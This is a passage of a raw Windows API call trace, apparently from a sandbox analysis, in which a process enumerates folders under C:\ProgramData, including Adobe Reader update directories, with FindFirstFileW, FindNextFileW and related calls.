lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", nBufferLength=0x105, lpBuffer=0x691ee44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFilePart=0x0) returned 0x34 [0132.212] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", nBufferLength=0x105, lpBuffer=0x691ee18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpFilePart=0x0) returned 0x35 [0132.213] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x691f064 | out: lpFindFileData=0x691f064*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.213] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.213] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0132.213] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f074 | out: lpFindFileData=0x691f074*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 0 [0132.213] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2fc) returned 1 [0132.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f308) returned 1 [0132.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0132.213] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM", lpFilePart=0x0) returned 0x18 [0132.213] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\", lpFilePart=0x0) returned 0x19 [0132.214] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.214] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.214] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0132.214] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0132.214] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0132.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0132.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0132.214] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM", lpFilePart=0x0) returned 0x18 [0132.214] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\", lpFilePart=0x0) returned 0x19 [0132.215] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.215] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.215] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0132.215] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.215] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0132.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0132.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0132.215] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", lpFilePart=0x0) returned 0x26 [0132.215] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpFilePart=0x0) returned 0x27 [0132.215] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.216] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.216] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp", cAlternateFileName="ADBERD~2.MSP")) returned 1 [0132.217] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0132.217] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0132.217] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.217] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0132.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0132.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0132.218] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", lpFilePart=0x0) returned 0x26 [0132.218] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpFilePart=0x0) returned 0x27 [0132.218] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.218] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.218] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp", cAlternateFileName="ADBERD~2.MSP")) returned 1 [0132.218] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0132.219] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0132.219] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 0 [0132.219] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0132.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0132.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.219] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Application Data", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Application Data", lpFilePart=0x0) returned 0x1f [0132.219] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Application Data\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Application Data\\", lpFilePart=0x0) returned 0x20 [0132.219] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Application Data\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0132.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f440) returned 1 [0132.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.221] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Desktop", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Desktop", lpFilePart=0x0) returned 0x16 [0132.221] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Desktop\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Desktop\\", lpFilePart=0x0) returned 0x17 [0132.221] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Desktop\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0132.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f440) returned 1 [0132.223] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.223] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Documents", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Documents", lpFilePart=0x0) returned 0x18 [0132.223] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Documents\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Documents\\", lpFilePart=0x0) returned 0x19 [0132.223] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Documents\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0132.223] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f440) returned 1 [0132.224] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.224] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Favorites", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Favorites", lpFilePart=0x0) returned 0x18 [0132.224] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Favorites\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Favorites\\", lpFilePart=0x0) returned 0x19 [0132.224] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Favorites\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0132.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f440) returned 1 [0132.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.226] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft", lpFilePart=0x0) returned 0x18 [0132.226] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\", lpFilePart=0x0) returned 0x19 [0132.226] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.226] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.226] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0132.226] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0132.226] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0132.227] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0132.227] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: 